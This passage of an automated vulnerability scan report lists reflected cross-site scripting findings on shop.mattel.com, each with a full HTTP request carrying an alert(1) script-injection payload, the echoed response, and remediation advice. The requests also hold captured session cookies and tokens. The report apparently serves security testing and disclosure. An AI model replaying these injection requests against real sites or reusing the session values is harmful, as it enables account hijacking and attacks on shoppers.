Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:26 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <!-- === Request Query String: a988f--><script>alert(1)</script>da1042d0f3d=1 --> ...[SNIP]...
1.55. https://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/affiliate/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7b99"-alert(1)-"9bd2d3d4d38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /affiliate/index.jsp?c7b99"-alert(1)-"9bd2d3d4d38=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:01 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38193
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.56. https://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/affiliate/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload da39a--><script>alert(1)</script>877791f5b35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /affiliate/index.jsp?da39a--><script>alert(1)</script>877791f5b35=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:02 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38225
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <!-- === Request Query String: da39a--><script>alert(1)</script>877791f5b35=1 --> ...[SNIP]...
The value of the categoryId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3ced"-alert(1)-"5910eac9a7a was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /brand/index.jsp?categoryId=3768131c3ced"-alert(1)-"5910eac9a7a HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:57 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31915
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
The value of the categoryId request parameter is copied into an HTML comment. The payload 30414--><script>alert(1)</script>ed84d125fcc was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /brand/index.jsp?categoryId=376813130414--><script>alert(1)</script>ed84d125fcc HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:58 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31947
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <!-- === Request Query String: categoryId=376813130414--><script>alert(1)</script>ed84d125fcc --> ...[SNIP]...
1.59. https://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/brand/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95e25"-alert(1)-"dca41e50f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /brand/index.jsp?95e25"-alert(1)-"dca41e50f50=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:56 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36543
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.60. https://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/brand/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload fb987--><script>alert(1)</script>1b3aab43a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /brand/index.jsp?fb987--><script>alert(1)</script>1b3aab43a=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:58 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36581
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <!-- === Request Query String: fb987--><script>alert(1)</script>1b3aab43a=1 --> ...[SNIP]...
1.61. https://shop.mattel.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/checkout/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 593fd"-alert(1)-"60a7e7979cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:43 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43976
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--Preview TimeZone = 'null' --><!--Preview Time ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.62. https://shop.mattel.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/checkout/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d4795--><script>alert(1)</script>7a3578d3d18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:44 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43228
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.63. https://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/emailSignup/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8323d--><script>alert(1)</script>25b88f59a0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /emailSignup/index.jsp?8323d--><script>alert(1)</script>25b88f59a0c=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:58 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control:
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/ ...[SNIP]... <!-- === Request Query String: 8323d--><script>alert(1)</script>25b88f59a0c=1 --> ...[SNIP]...
1.64. https://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/emailSignup/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77927"-alert(1)-"63de54cd57b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /emailSignup/index.jsp?77927"-alert(1)-"63de54cd57b=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:56 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control:
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.65. https://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/giftCertificates/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7155e--><script>alert(1)</script>64bb62cd0af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /giftCertificates/index.jsp?7155e--><script>alert(1)</script>64bb62cd0af=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:03 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.66. https://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/giftCertificates/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e95e4"-alert(1)-"ba8774a4224 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /giftCertificates/index.jsp?e95e4"-alert(1)-"ba8774a4224=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
